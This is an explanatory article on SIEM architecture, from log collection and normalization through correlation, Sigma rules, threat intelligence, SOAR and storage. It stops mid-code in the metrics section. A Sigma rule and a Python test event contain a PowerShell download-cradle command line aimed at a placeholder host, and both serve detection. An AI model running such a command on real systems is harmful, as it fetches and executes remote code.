How SIEM Works: Security Information and Event Management
SIEM (Security Information and Event Management) is a centralized platform that collects, normalizes, correlates, and analyzes security event data from across an organization's entire IT infrastructure -- firewalls, IDS/IPS sensors, servers, endpoints, applications, cloud services, identity providers, and network devices. A SIEM transforms millions of individual log entries and alerts into actionable intelligence by correlating events across sources and time, detecting patterns that no single data source could reveal on its own.
The term SIEM was coined by Gartner in 2005, combining two earlier concepts: SIM (Security Information Management, focused on log collection and retention) and SEM (Security Event Management, focused on real-time analysis and alerting). Modern SIEMs have evolved far beyond simple log aggregation. They incorporate user and entity behavior analytics (UEBA), threat intelligence integration, automated response playbooks (SOAR), and increasingly, cloud-native architectures that can process petabytes of security telemetry.
This article covers the core architecture of SIEM systems: how logs are collected and normalized, how correlation rules detect threats, how threat intelligence enriches detections, how SOAR automates response, and the practical considerations of deploying and operating a SIEM at scale.
The Problem SIEM Solves
A mid-sized organization might generate security events from dozens of sources:
- Firewalls logging connection accepts/denies at 10,000+ events per second
- IDS/IPS sensors generating thousands of alerts per day
- Web application firewalls logging blocked and suspicious HTTP requests
- Windows Active Directory recording authentication events (4624, 4625, 4768, 4769)
- Linux auditd logging system calls, file accesses, and privilege escalations
- VPN concentrators logging user connections and disconnections
- DNS servers logging query/response pairs
- Email gateways logging spam, phishing, and malware detections
- Cloud platforms (AWS CloudTrail, Azure Activity Log, GCP Audit Log) recording API calls
- Endpoint Detection and Response (EDR) agents reporting process executions and file changes
Without a SIEM, a security analyst would need to log into each of these systems individually, manually correlate timestamps and IP addresses across different log formats, and somehow identify the needle-in-a-haystack pattern that indicates a real attack among millions of benign events. A SIEM automates this process.
Architecture Overview
Log Collection and Transport
The first challenge in building a SIEM is getting log data from source systems to the SIEM platform. There are several transport mechanisms, each with different trade-offs:
Syslog (RFC 5424)
The oldest and most universal log transport protocol. Originally carried over UDP port 514 (documented in RFC 3164), modern syslog can also run over TCP with TLS encryption (RFC 5425, default port 6514) for reliable, secure transport. Nearly every network device, Linux server, and security appliance can export logs via syslog.
Syslog messages have a standardized header containing priority (facility + severity), timestamp, hostname, and application name, followed by the message body. The message body format, however, is vendor-specific -- a Cisco ASA firewall, a Palo Alto NGFW, and a Linux auditd daemon all produce wildly different syslog message formats that must be parsed individually.
<134>1 2025-03-15T14:22:33.042Z fw-border-01 ASA 12345 - - %ASA-6-302013: Built inbound TCP connection 4521032 for outside:198.51.100.42/54321 (198.51.100.42/54321) to inside:10.0.1.50/443 (203.0.113.10/443)
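To make the header layout concrete, here is a minimal Python sketch that splits an RFC 5424 line into its header fields and decodes the priority value (PRI = facility * 8 + severity). The regular expression is a simplification written for this article, not a complete RFC 5424 parser: it assumes structured data is either "-" or simple bracketed elements without escaped brackets, and it leaves the vendor-specific message body untouched.

```python
import re
from typing import NamedTuple

# RFC 5424 header: <PRI>VERSION TIMESTAMP HOSTNAME APP-NAME PROCID MSGID SD MSG
HEADER = re.compile(
    r"<(?P<pri>\d{1,3})>(?P<version>\d+) (?P<timestamp>\S+) (?P<hostname>\S+) "
    r"(?P<app>\S+) (?P<procid>\S+) (?P<msgid>\S+) (?P<sd>-|(?:\[.*?\])+) (?P<msg>.*)",
    re.DOTALL,
)


class SyslogEvent(NamedTuple):
    facility: int
    severity: int
    timestamp: str
    hostname: str
    app: str
    message: str


def parse_rfc5424(line: str) -> SyslogEvent:
    match = HEADER.match(line)
    if match is None:
        raise ValueError("not an RFC 5424 message")
    # The priority value encodes both facility and severity.
    facility, severity = divmod(int(match["pri"]), 8)
    return SyslogEvent(
        facility, severity, match["timestamp"],
        match["hostname"], match["app"], match["msg"],
    )


line = (
    "<134>1 2025-03-15T14:22:33.042Z fw-border-01 ASA 12345 - - "
    "%ASA-6-302013: Built inbound TCP connection 4521032"
)
event = parse_rfc5424(line)
print(event.facility, event.severity, event.hostname)  # 16 6 fw-border-01
```

Facility 16 is local0 and severity 6 is informational. Everything after the header still needs a vendor-specific parser.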
Agent-Based Collection
Lightweight agents installed on endpoints forward logs to the SIEM. Common agents include:
- Elastic Agent / Filebeat -- ships log files and system metrics to Elasticsearch-based SIEMs.
- Splunk Universal Forwarder -- monitors log files, Windows Event Logs, and other data sources and forwards them to Splunk indexers.
- Fluentd / Fluent Bit -- open-source log collectors that support hundreds of input/output plugins.
- rsyslog / syslog-ng -- high-performance syslog implementations that can buffer, filter, and reliably forward log data.
Agents provide advantages over raw syslog: reliable delivery with buffering and retry, structured parsing at the source, encryption in transit, and the ability to collect data that is not natively emitted as syslog (binary files, Windows Event Log entries, container logs).
API-Based Collection
Cloud services and SaaS applications typically expose logs through REST APIs rather than syslog. The SIEM polls these APIs on a schedule (or receives webhooks) to ingest cloud security data:
- AWS -- CloudTrail (API audit), VPC Flow Logs, GuardDuty findings, WAF logs (via S3 or CloudWatch)
- Azure -- Activity Log, Azure AD sign-in logs, Defender alerts (via Event Hub or REST API)
- GCP -- Cloud Audit Logs, VPC Flow Logs (via Pub/Sub or Cloud Logging API)
- SaaS -- Office 365 Management Activity API, Google Workspace Admin SDK, Okta System Log API
Log Normalization and Enrichment
Raw logs from different sources use different field names, formats, timestamps, and conventions. A firewall might log source IPs as src, source_address, or SrcAddr. Timestamps might be Unix epochs, ISO 8601, or vendor-specific formats. Without normalization, writing correlation rules that span multiple data sources would require listing every possible field name variation.
Normalization maps raw log fields to a common schema. The most widely used schemas are:
- Elastic Common Schema (ECS) -- an open-source schema with standardized field names (source.ip, destination.port, event.action, user.name). Used by the Elastic Stack (ELK) and Elastic Security.
- Splunk Common Information Model (CIM) -- Splunk's normalization framework with standardized field names organized into data models (Authentication, Network Traffic, Endpoint, etc.).
- OCSF (Open Cybersecurity Schema Framework) -- a newer open-source schema backed by AWS, Splunk, IBM, and others, designed as a vendor-neutral standard for security telemetry.
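The mapping step can be sketched in a few lines of Python. The alias table and the timestamp key names ("ts", "timestamp", "time") below are hypothetical examples, not taken from any vendor's parser. The target names follow ECS conventions, and naive timestamps are assumed to be UTC.

```python
from datetime import datetime, timezone

# Hypothetical per-source field aliases mapped to ECS-style names.
FIELD_ALIASES = {
    "src": "source.ip", "source_address": "source.ip", "SrcAddr": "source.ip",
    "dst": "destination.ip", "DstAddr": "destination.ip",
    "dport": "destination.port", "DstPort": "destination.port",
    "user": "user.name", "UserName": "user.name",
}
TIMESTAMP_KEYS = {"ts", "timestamp", "time"}


def normalize_timestamp(value) -> str:
    """Accept a Unix epoch or an ISO 8601 string; return ISO 8601 in UTC."""
    if isinstance(value, (int, float)):
        dt = datetime.fromtimestamp(value, tz=timezone.utc)
    else:
        dt = datetime.fromisoformat(str(value).replace("Z", "+00:00"))
        if dt.tzinfo is None:
            dt = dt.replace(tzinfo=timezone.utc)  # assumption: naive means UTC
    return dt.astimezone(timezone.utc).isoformat()


def normalize(raw: dict) -> dict:
    event = {}
    for key, value in raw.items():
        if key in TIMESTAMP_KEYS:
            event["@timestamp"] = normalize_timestamp(value)
        else:
            # Unknown fields are passed through unchanged.
            event[FIELD_ALIASES.get(key, key)] = value
    return event


firewall_a = normalize({"SrcAddr": "198.51.100.42", "DstPort": 443, "ts": 1742048553})
firewall_b = normalize({"src": "198.51.100.42", "dport": 443, "time": "2025-03-15T14:22:33Z"})
print(firewall_a == firewall_b)  # True
```

Once both firewalls emit the same field names and timestamp format, a single correlation rule can cover them.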
Enrichment adds context to normalized events:
- GeoIP -- resolve IP addresses to geographic locations, ASNs, and organizations.
- Asset inventory -- map IP addresses to hostname, owner, criticality, and business function. An alert on a development VM needs different urgency than the same alert on a production database server.
- Threat intelligence -- check IP addresses, domains, and file hashes against threat intelligence feeds to identify known malicious indicators.
- User identity -- resolve user IDs to names, departments, and roles via Active Directory or identity provider lookups.
- DNS resolution -- reverse-resolve IP addresses to hostnames for readability.
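As a rough illustration of enrichment, the sketch below attaches asset context and threat intelligence matches to a normalized event. The lookup tables, the internal network range, and the output field names are all hypothetical stand-ins. A real deployment would query a CMDB, an identity provider, and a threat intelligence platform instead of in-memory dictionaries.

```python
import ipaddress

# Hypothetical lookup data for illustration only.
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]
ASSETS = {
    "10.0.1.50": {"hostname": "db-prod-01", "criticality": "high"},
    "10.0.9.17": {"hostname": "dev-vm-17", "criticality": "low"},
}
KNOWN_BAD_IPS = {"198.51.100.42"}


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def enrich(event: dict) -> dict:
    enriched = dict(event)  # leave the original event untouched
    for side in ("source", "destination"):
        ip = event.get(f"{side}.ip")
        if ip is None:
            continue
        enriched[f"{side}.is_internal"] = is_internal(ip)
        if ip in ASSETS:
            enriched[f"{side}.asset"] = ASSETS[ip]
        if ip in KNOWN_BAD_IPS:
            enriched.setdefault("threat.matches", []).append(ip)
    return enriched


result = enrich({"source.ip": "198.51.100.42", "destination.ip": "10.0.1.50"})
print(result["destination.asset"]["criticality"], result["threat.matches"])
```

An explicit network list is used here rather than `ipaddress`'s `is_private` flag, because that flag also treats documentation ranges such as 198.51.100.0/24 as private.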
Correlation Rules
Correlation rules are the intelligence of a SIEM. They define patterns of events across multiple sources and time windows that indicate security threats. A well-designed correlation rule transforms millions of individual log entries into a handful of high-confidence alerts.
Rule Types
- Single-event rules -- alert when a single event matches specific criteria. Example: "alert when a firewall logs a connection to a known C2 IP address." These are simple threshold-less rules that rely on the quality of the matching criteria (usually a threat intelligence feed).
- Threshold rules -- alert when the count of matching events exceeds a threshold within a time window. Example: "alert when more than 10 failed SSH login attempts from the same source IP within 5 minutes." This filters out individual failed attempts (common, benign) while detecting brute-force attacks.
- Sequence rules -- alert when events occur in a specific order across multiple sources. Example: "alert when (1) a user authenticates to VPN from an unusual country, followed by (2) that user accessing a sensitive file share within 30 minutes." This detects compromised credentials being used from a foreign location.
- Aggregation rules -- alert based on statistical aggregation. Example: "alert when the total bytes transferred by a single internal host to external destinations exceeds 1 GB in one hour." This detects data exfiltration.
- Absence rules -- alert when an expected event does not occur. Example: "alert if a critical server has not sent a heartbeat log in 10 minutes." This detects silent failures or compromised logging.
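Absence rules are the least intuitive of these types, because they fire on something that did not happen. A minimal sketch, assuming the SIEM keeps a table of the last heartbeat time per host (the `last_seen` dictionary and host names here are hypothetical):

```python
from datetime import datetime, timedelta


def silent_hosts(last_seen: dict, now: datetime, max_gap: timedelta) -> list:
    """Return hosts whose most recent heartbeat is older than max_gap."""
    return sorted(host for host, ts in last_seen.items() if now - ts > max_gap)


now = datetime(2025, 3, 15, 14, 30)
last_seen = {
    "db-prod-01": now - timedelta(minutes=12),  # missed its heartbeat
    "web-01": now - timedelta(minutes=2),
}
print(silent_hosts(last_seen, now, timedelta(minutes=10)))  # ['db-prod-01']
```

The check has to run on a schedule, because no incoming event triggers it.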
Sigma Rules: Vendor-Neutral Detection
Sigma is an open-source, vendor-neutral detection rule format for SIEM systems. Sigma rules are written in YAML and can be automatically converted to the query language of any supported SIEM (Splunk SPL, Elastic KQL, QRadar AQL, Microsoft Sentinel KQL, etc.). This allows the security community to share detection logic without being locked into a specific SIEM vendor.
A Sigma rule detecting suspicious PowerShell execution:
title: Suspicious PowerShell Download Cradle
id: a3f9c5d7-b298-4c13-b4c6-d8f94e39a1b7
status: stable
description: Detects PowerShell commands commonly used to download and execute malicious payloads
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\powershell.exe'
        CommandLine|contains|all:
            - 'Net.WebClient'
            - 'DownloadString'
    condition: selection
level: high
tags:
    - attack.execution
    - attack.t1059.001
    - attack.t1105
The community maintains thousands of Sigma rules covering MITRE ATT&CK techniques, organized by tactic and platform. Sigma has become the de facto standard for sharing SIEM detection content.
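To show what the field modifiers in such a rule mean, the following Python sketch evaluates a Sigma-style selection against a single event. It is an illustration of the matching semantics only (fields in a selection are AND-ed, a list of values is OR-ed unless the `all` modifier is present, string matching is case-insensitive), not the actual Sigma converter. It covers just the `contains`, `startswith`, `endswith`, and `all` modifiers.

```python
def field_matches(value: str, modifiers: list, expected) -> bool:
    """Evaluate one Sigma-style field condition against a string value."""
    patterns = expected if isinstance(expected, list) else [expected]
    value_l = value.lower()
    if "contains" in modifiers:
        hits = [p.lower() in value_l for p in patterns]
    elif "endswith" in modifiers:
        hits = [value_l.endswith(p.lower()) for p in patterns]
    elif "startswith" in modifiers:
        hits = [value_l.startswith(p.lower()) for p in patterns]
    else:
        hits = [value_l == p.lower() for p in patterns]
    # A list of values is OR-ed unless the "all" modifier is present.
    return all(hits) if "all" in modifiers else any(hits)


def selection_matches(event: dict, selection: dict) -> bool:
    """Every field condition in a selection must match (logical AND)."""
    for key, expected in selection.items():
        field, *modifiers = key.split("|")
        if field not in event:
            return False
        if not field_matches(str(event[field]), modifiers, expected):
            return False
    return True


selection = {
    "Image|endswith": r"\powershell.exe",
    "CommandLine|contains|all": ["Net.WebClient", "DownloadString"],
}
cradle = {
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "CommandLine": "powershell -c IEX (New-Object Net.WebClient)"
                   ".DownloadString('http://example.test/a.ps1')",
}
benign = dict(cradle, CommandLine="powershell Get-Process")
print(selection_matches(cradle, selection), selection_matches(benign, selection))
```

In practice the rule is converted into the SIEM's native query language and run there, not evaluated event by event in Python.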
Example Correlation Scenarios
Credential Stuffing Detection:
-- Pseudo-rule: multiple accounts failing auth from one IP
WHEN count(failed_auth events
           WHERE source.ip = X
             AND event.outcome = "failure"
           GROUP BY source.ip
           WITHIN 10 minutes) > 50
  AND distinct_count(user.name) > 10
THEN alert "Credential Stuffing" severity HIGH
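One way to implement this pseudo-rule is a sliding window per source IP. The sketch below is a simplified in-memory version that assumes events arrive in timestamp order. The class name and method signature are invented for illustration, and a production correlation engine would also handle late events and bound its memory use.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta


class CredentialStuffingDetector:
    def __init__(self, window=timedelta(minutes=10), max_failures=50, max_users=10):
        self.window = window
        self.max_failures = max_failures
        self.max_users = max_users
        self._failures = defaultdict(deque)  # source IP -> deque of (ts, user)

    def observe(self, ts: datetime, source_ip: str, user: str, outcome: str) -> bool:
        """Record one auth event; return True if the rule fires for this IP."""
        if outcome != "failure":
            return False
        recent = self._failures[source_ip]
        recent.append((ts, user))
        # Drop failures that have fallen out of the time window.
        while recent and ts - recent[0][0] > self.window:
            recent.popleft()
        distinct_users = {u for _, u in recent}
        return len(recent) > self.max_failures and len(distinct_users) > self.max_users


detector = CredentialStuffingDetector()
start = datetime(2025, 3, 15, 14, 0)
results = [
    detector.observe(start + timedelta(seconds=i), "203.0.113.7", f"user{i}", "failure")
    for i in range(51)
]
print(results[-1])  # True: 51 failures across 51 accounts within one minute
```

The distinct-user condition is what separates credential stuffing from a brute-force attack on a single account, which produces many failures but only one user name.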
Lateral Movement Detection:
-- Sequence: compromised host scanning then connecting internally
WHEN event_A = (IDS alert "Network Scan" from host X)
FOLLOWED BY event_B = (
    auth_success from host X to host Y
    WHERE X != Y
      AND both are in $HOME_NET
    WITHIN 30 minutes of event_A
)
FOLLOWED BY event_C = (
    process_creation on host Y
    WHERE process.name in ("psexec.exe", "wmic.exe", "cmd.exe")
    WITHIN 15 minutes of event_B
)
THEN alert "Probable Lateral Movement" severity CRITICAL
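A sequence rule like this is essentially a small state machine keyed by host. The sketch below is one possible reading of the pseudo-rule, assuming events are dictionaries sorted by time. The event shapes ("type", "src", "dst", "host", "process", "signature") and the HOME_NET range are assumptions made for the example.

```python
import ipaddress
from datetime import datetime, timedelta

HOME_NET = ipaddress.ip_network("10.0.0.0/8")  # assumption for the example
REMOTE_EXEC = {"psexec.exe", "wmic.exe", "cmd.exe"}


def in_home_net(host: str) -> bool:
    return ipaddress.ip_address(host) in HOME_NET


def detect_lateral_movement(events: list) -> list:
    """Return (scanner, target) pairs that complete the A -> B -> C sequence."""
    scans = {}   # host X -> time of the scan alert (event A)
    logins = {}  # host Y -> (host X, time of the auth success) (event B)
    alerts = []
    for e in events:  # events must be sorted by e["ts"]
        ts = e["ts"]
        if e["type"] == "ids_alert" and e["signature"] == "Network Scan":
            scans[e["src"]] = ts
        elif e["type"] == "auth_success":
            x, y = e["src"], e["dst"]
            scanned_at = scans.get(x)
            if (scanned_at is not None and x != y
                    and in_home_net(x) and in_home_net(y)
                    and ts - scanned_at <= timedelta(minutes=30)):
                logins[y] = (x, ts)
        elif e["type"] == "process_creation":
            y = e["host"]
            if y in logins and e["process"].lower() in REMOTE_EXEC:
                x, logged_in_at = logins[y]
                if ts - logged_in_at <= timedelta(minutes=15):
                    alerts.append((x, y))
    return alerts


t0 = datetime(2025, 3, 15, 14, 0)
events = [
    {"ts": t0, "type": "ids_alert", "signature": "Network Scan", "src": "10.0.1.5"},
    {"ts": t0 + timedelta(minutes=10), "type": "auth_success",
     "src": "10.0.1.5", "dst": "10.0.2.9"},
    {"ts": t0 + timedelta(minutes=15), "type": "process_creation",
     "host": "10.0.2.9", "process": "cmd.exe"},
]
print(detect_lateral_movement(events))  # [('10.0.1.5', '10.0.2.9')]
```

Each stage only advances if the previous stage was seen for the same host within its time limit, so the individual events stay silent on their own.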
Data Exfiltration Detection:
-- Aggregation: unusual outbound data volume
WHEN sum(network.bytes_out
         WHERE source.ip IN $INTERNAL_SERVERS
           AND destination.ip NOT IN $KNOWN_BACKUP_DESTINATIONS
         GROUP BY source.ip
         WITHIN 1 hour) > 5GB
  AND time_of_day NOT IN (scheduled_backup_window)
THEN alert "Possible Data Exfiltration" severity HIGH
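The aggregation can be approximated with fixed one-hour buckets, as in the sketch below. This is a simplification of the pseudo-rule: a true "within 1 hour" condition is a sliding window, so a burst that straddles an hour boundary could be missed here. The flow record shape and the `backup_hours` parameter are hypothetical.

```python
from collections import defaultdict
from datetime import datetime

THRESHOLD_BYTES = 5 * 10**9  # 5 GB, using decimal gigabytes


def exfil_candidates(flows, internal_servers, backup_destinations,
                     backup_hours=frozenset()):
    """Return (source IP, hour bucket) pairs whose outbound volume exceeds the threshold."""
    totals = defaultdict(int)
    for f in flows:
        if f["src"] not in internal_servers or f["dst"] in backup_destinations:
            continue
        if f["ts"].hour in backup_hours:
            continue  # inside the scheduled backup window
        bucket = f["ts"].replace(minute=0, second=0, microsecond=0)
        totals[(f["src"], bucket)] += f["bytes_out"]
    return sorted(key for key, total in totals.items() if total > THRESHOLD_BYTES)


flows = [
    {"ts": datetime(2025, 3, 15, 14, 5), "src": "10.0.1.50",
     "dst": "198.51.100.42", "bytes_out": 3 * 10**9},
    {"ts": datetime(2025, 3, 15, 14, 40), "src": "10.0.1.50",
     "dst": "198.51.100.42", "bytes_out": 3 * 10**9},
    {"ts": datetime(2025, 3, 15, 14, 20), "src": "10.0.1.51",
     "dst": "203.0.113.10", "bytes_out": 9 * 10**9},  # known backup target
]
hits = exfil_candidates(flows, {"10.0.1.50", "10.0.1.51"}, {"203.0.113.10"})
print(hits)
```

Only 10.0.1.50 is reported: its two transfers total 6 GB in the 14:00 bucket, while the larger transfer from 10.0.1.51 goes to an approved backup destination.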
Threat Intelligence Integration
Threat intelligence feeds provide lists of known-malicious indicators of compromise (IOCs) that the SIEM matches against incoming events in real time. IOC types include:
- IP addresses -- known command-and-control servers, scanning infrastructure, botnet nodes. These have a short shelf life; attackers rotate infrastructure frequently.
- Domain names -- malicious domains used for phishing, malware delivery, or C2 communication.
- File hashes -- SHA-256 or MD5 hashes of known malware samples, matched against endpoint file creation events or email attachment hashes.
- URLs -- specific malicious URLs (phishing pages, exploit kit landing pages).
- TLS certificate fingerprints -- certificates associated with malicious infrastructure.
- YARA rules -- pattern-matching rules for malware file content, used for endpoint and sandbox detections.
Threat intelligence is consumed via standardized protocols:
- STIX/TAXII -- Structured Threat Information eXpression (STIX) is a JSON-based language for describing threat intelligence. Trusted Automated Exchange of Intelligence Information (TAXII) is the application-layer protocol, carried over HTTPS, for distributing STIX objects. Most commercial and open-source threat intelligence platforms support STIX 2.1/TAXII 2.1.
- MISP -- Malware Information Sharing Platform, an open-source threat intelligence platform widely used by CERTs, ISACs, and security teams for sharing IOCs in structured formats.
Common threat intelligence sources include commercial feeds (Recorded Future, CrowdStrike, Mandiant), open-source feeds (Abuse.ch, AlienVault OTX, PhishTank), and industry-specific sharing communities (FS-ISAC for financial services, H-ISAC for healthcare).
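Whatever the feed format, the matching step inside the SIEM usually comes down to fast set lookups with an expiry time per indicator, since indicators such as IP addresses go stale quickly. The sketch below is a hypothetical in-memory store. The class, its methods, and the choice of event fields to check are illustrative and do not belong to any particular product.

```python
from datetime import datetime, timedelta


class IndicatorStore:
    """In-memory IOC table keyed by (type, value) with a per-indicator expiry."""

    # Event fields checked for each indicator type (ECS-style names).
    FIELDS = {
        "ipv4": ("source.ip", "destination.ip"),
        "domain": ("dns.question.name",),
        "sha256": ("file.hash.sha256",),
    }

    def __init__(self):
        self._iocs = {}

    def add(self, ioc_type: str, value: str, valid_until: datetime) -> None:
        self._iocs[(ioc_type, value.lower())] = valid_until

    def match(self, event: dict, now: datetime) -> list:
        hits = []
        for ioc_type, fields in self.FIELDS.items():
            for name in fields:
                value = event.get(name)
                if value is None:
                    continue
                expiry = self._iocs.get((ioc_type, str(value).lower()))
                if expiry is not None and now <= expiry:
                    hits.append((ioc_type, value))
        return hits


now = datetime(2025, 3, 15, 14, 0)
store = IndicatorStore()
store.add("ipv4", "198.51.100.42", now + timedelta(days=7))
store.add("domain", "old-c2.example", now - timedelta(days=1))  # already expired
event = {"destination.ip": "198.51.100.42", "dns.question.name": "old-c2.example"}
print(store.match(event, now))  # [('ipv4', '198.51.100.42')]
```

Expiring indicators keeps stale infrastructure, which may since have been reassigned to legitimate users, from generating false positives.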
SOAR: Security Orchestration, Automation, and Response
SOAR extends the SIEM from detection to response. While a SIEM tells you "something bad is happening," SOAR defines what to do about it through automated playbooks. Modern SIEMs increasingly integrate SOAR capabilities natively (Splunk SOAR, Microsoft Sentinel Playbooks, Elastic Security response actions).
Playbook Architecture
A SOAR playbook is a sequence of automated actions triggered by a SIEM alert. Playbooks typically follow a pattern:
- Triage -- enrich the alert with additional context (query threat intel, look up asset criticality, check recent login history for the affected user).
- Evaluate -- apply logic to determine if the alert is a true positive or likely false positive. If the affected asset is a honeypot, escalate immediately. If the source IP is a known scanner, lower severity.
- Contain -- take automated containment actions: block the malicious IP on the firewall, isolate the affected endpoint from the network, disable the compromised user account, quarantine a malicious email across all mailboxes.
- Notify -- create a ticket in the incident management system, send Slack/PagerDuty notifications to the on-call analyst, escalate to the incident response team if severity warrants it.
- Document -- record all actions taken, evidence collected, and timeline in a case management system for post-incident review.
Example playbook -- phishing email detected:
- SIEM alert: email gateway detected a phishing email delivered to a user.
- SOAR queries the email gateway API to retrieve the full email (headers, body, attachments, URLs).
- SOAR detonates any attachments in a sandbox and checks URLs against threat intelligence.
- If confirmed malicious: SOAR searches for the same email across all mailboxes and quarantines all instances.
- SOAR checks if the user clicked any URLs in the email (via web proxy logs).
- If clicked: SOAR isolates the user's endpoint, resets their password, revokes active sessions, and creates a high-severity incident.
- If not clicked: SOAR creates a low-severity ticket for analyst review and sends the user a phishing awareness notification.
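The branching in this playbook can be sketched as ordinary code. In the example below every integration is replaced by a stub that records the action it would take, and the two decision points are passed in as functions. The action names and alert fields are invented for illustration. The source does not say what happens when the email turns out not to be malicious, so that branch (closing the case as benign) is an assumption.

```python
from dataclasses import dataclass, field


@dataclass
class Actions:
    """Stand-in for real integrations; each call just records the step."""
    log: list = field(default_factory=list)

    def do(self, step: str) -> None:
        self.log.append(step)


def phishing_playbook(alert: dict, actions: Actions, is_malicious, user_clicked) -> str:
    email, user = alert["message_id"], alert["recipient"]
    actions.do(f"fetch_email:{email}")
    actions.do(f"detonate_and_check_urls:{email}")
    if not is_malicious(email):
        actions.do("close_as_benign")  # assumption: branch not described in the text
        return "benign"
    actions.do(f"quarantine_all_copies:{email}")
    if user_clicked(user, email):
        for step in ("isolate_endpoint", "reset_password", "revoke_sessions"):
            actions.do(f"{step}:{user}")
        actions.do("create_incident:high")
        return "high"
    actions.do("create_ticket:low")
    actions.do(f"send_awareness_notice:{user}")
    return "low"


actions = Actions()
severity = phishing_playbook(
    {"message_id": "msg-123", "recipient": "alice"},
    actions,
    is_malicious=lambda email: True,
    user_clicked=lambda user, email: True,
)
print(severity, actions.log)
```

Keeping the decisions as injectable functions makes the playbook testable against simulated alerts before it is allowed to take real containment actions.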
Storage and Retention
SIEM storage is one of the largest operational costs. A mid-sized organization ingesting 50,000 events per second generates approximately 4 TB of raw log data per day, assuming an average event size of roughly 1 KB. Regulatory requirements often mandate retaining this data for 1-7 years, leading to petabyte-scale storage challenges.
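The arithmetic behind these figures is easy to reproduce. The short calculation below assumes an average raw event size of 1,000 bytes (an assumption, since real averages vary widely by source) and ignores compression and index overhead.

```python
SECONDS_PER_DAY = 86_400


def daily_volume_tb(events_per_second: float, avg_event_bytes: float) -> float:
    """Raw daily log volume in decimal terabytes."""
    return events_per_second * SECONDS_PER_DAY * avg_event_bytes / 1e12


def retained_volume_pb(daily_tb: float, years: float) -> float:
    """Raw volume held after retaining every day for the given number of years."""
    return daily_tb * 365 * years / 1000


daily = daily_volume_tb(50_000, 1_000)
print(round(daily, 2))                         # 4.32 TB per day
print(round(retained_volume_pb(daily, 7), 2))  # 11.04 PB after seven years
```

Halving the average event size halves both numbers, which is why filtering and summarization before ingestion have such a large effect on cost.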
Modern SIEMs use tiered storage architectures:
- Hot tier (NVMe/SSD) -- stores the most recent data (7-30 days) for real-time searching and correlation. This tier must support sub-second query response times. Elasticsearch, Splunk's indexer tier, and ClickHouse are common hot-tier backends.
- Warm tier (HDD) -- stores older data (30 days to 12 months) that is still searchable but with slower query performance. Data is typically compressed and indexed less aggressively.
- Cold/Frozen tier (object storage) -- stores archived data (1-7+ years) in cloud object storage (S3, GCS, Azure Blob). Data may need to be rehydrated before searching, with query times measured in minutes rather than seconds. This tier satisfies compliance and forensic requirements at minimal cost.
Strategies for managing SIEM storage costs include:
- Pre-ingestion filtering -- drop known-benign, high-volume events before they enter the SIEM. For example, successful DNS resolutions to known-good domains, routine SNMP polling responses, and health check logs from load balancers.
- Event summarization -- aggregate repetitive events into summary records. Instead of storing 10,000 identical firewall deny events per minute, store a single summary with the count, source, and time range.
- Selective indexing -- index only fields needed for searching and correlation. Raw log text is stored but not fully indexed, reducing storage by 30-50%.
- Data routing -- send high-value security data (authentication, IDS alerts, endpoint detections) to the full-featured SIEM and route operational data (performance metrics, debug logs) to a less expensive logging platform.
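Event summarization, for example, can be as simple as grouping identical events and keeping a count and a time range. The sketch below assumes normalized events with ECS-style field names and a comparable "@timestamp" value (epoch seconds here). The choice of grouping fields is an assumption and would depend on which details the detections actually need.

```python
def summarize(events, key_fields=("source.ip", "destination.ip",
                                  "destination.port", "event.action")):
    """Collapse events that share the same key fields into one summary record each."""
    groups = {}
    for e in events:
        key = tuple(e.get(f) for f in key_fields)
        ts = e["@timestamp"]
        stats = groups.setdefault(key, {"count": 0, "first_seen": ts, "last_seen": ts})
        stats["count"] += 1
        stats["first_seen"] = min(stats["first_seen"], ts)
        stats["last_seen"] = max(stats["last_seen"], ts)
    return [dict(zip(key_fields, key), **stats) for key, stats in groups.items()]


deny = {"source.ip": "198.51.100.42", "destination.ip": "10.0.1.50",
        "destination.port": 23, "event.action": "deny"}
events = [
    dict(deny, **{"@timestamp": 1742048553}),
    dict(deny, **{"@timestamp": 1742048560}),
    dict(deny, **{"@timestamp": 1742048590, "destination.port": 22}),
]
for record in summarize(events):
    print(record["destination.port"], record["count"])
```

The trade-off is forensic detail: per-event fields that are not part of the key, such as individual source ports, are lost once events are summarized.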
SIEM Deployment Architectures
On-Premises SIEM
Traditional SIEMs run entirely on-premises: dedicated hardware for log collection, indexing, storage, and the correlation engine. Splunk Enterprise, IBM QRadar, and the Elastic Stack (self-managed) are common on-premises deployments. Advantages include full data sovereignty and control over infrastructure. Disadvantages include significant capital expenditure, operational overhead, and scalability limitations.
Cloud-Native SIEM
Cloud-native SIEMs run as managed services in the cloud: Microsoft Sentinel (on Azure), Google Chronicle (on Google Cloud), Splunk Cloud, and Elastic Cloud. These platforms offer elastic scalability, reduced operational overhead, and consumption-based pricing. They are particularly well-suited for organizations with significant cloud infrastructure, as log collection from cloud services is often native and zero-configuration.
Hybrid SIEM
Many organizations adopt a hybrid approach: cloud SIEM for cloud workloads, with on-premises log collectors forwarding data from legacy infrastructure. This addresses data sovereignty concerns (keeping certain logs on-premises) while leveraging cloud scalability for storage and analysis.
Measuring SIEM Effectiveness
A SIEM is only as good as its detection coverage, alert quality, and response speed. Key metrics include:
- Mean Time to Detect (MTTD) -- the average time between an attack's first observable event and the SIEM generating an alert. Industry averages are disturbingly high (days to months for sophisticated attacks). A well-tuned SIEM targets MTTD under 1 hour for known attack patterns.
- Mean Time to Respond (MTTR) -- the average time from alert to containment. SOAR automation can reduce this from hours to minutes for common incident types.
- True positive rate -- the percentage of alerts that represent actual security incidents (strictly speaking, this is alert precision). A rate below 20% indicates severe over-alerting that leads to alert fatigue.
- MITRE ATT&CK coverage -- what percentage of ATT&CK techniques have corresponding detection rules? Organizations should prioritize techniques most relevant to their threat model.
- Events per second (EPS) -- the SIEM's ingestion rate. If the SIEM falls behind, events are dropped or delayed, and real-time correlation fails.
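The first three metrics can be computed directly from incident records. The sketch below assumes each confirmed incident carries three timestamps (first observable event, alert, containment) and that the total alert count for the period is known. The record field names are hypothetical.

```python
from datetime import datetime, timedelta
from statistics import mean


def soc_metrics(incidents: list, total_alerts: int) -> dict:
    """Compute MTTD, MTTR (in minutes) and the share of alerts that were real incidents."""
    detect = [(i["alerted"] - i["first_event"]).total_seconds() / 60 for i in incidents]
    respond = [(i["contained"] - i["alerted"]).total_seconds() / 60 for i in incidents]
    return {
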